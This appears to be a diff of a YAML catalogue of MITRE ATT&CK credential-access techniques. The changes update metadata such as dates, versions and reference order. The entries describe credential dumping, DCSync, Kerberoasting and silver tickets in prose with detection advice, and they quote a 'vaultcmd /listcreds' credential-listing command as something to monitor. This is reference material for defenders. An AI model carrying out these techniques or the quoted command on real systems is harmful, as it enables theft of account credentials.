       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -47021,11 +47756,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47093,34 +47827,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47129,20 +47839,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests: []
   T1558.002:
@@ -47174,7 +47906,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47200,13 +47932,11 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests: []
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -47223,24 +47953,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -47281,36 +48011,13 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -47331,6 +48038,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -47345,52 +48053,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -47412,6 +48110,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -47422,23 +48121,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -47509,9 +48235,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -47570,12 +48295,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests: []
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -47607,6 +48331,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -47616,7 +48341,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -47628,111 +48352,49 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests: []
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -47743,26 +48405,88 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -47775,6 +48499,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -47811,17 +48536,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
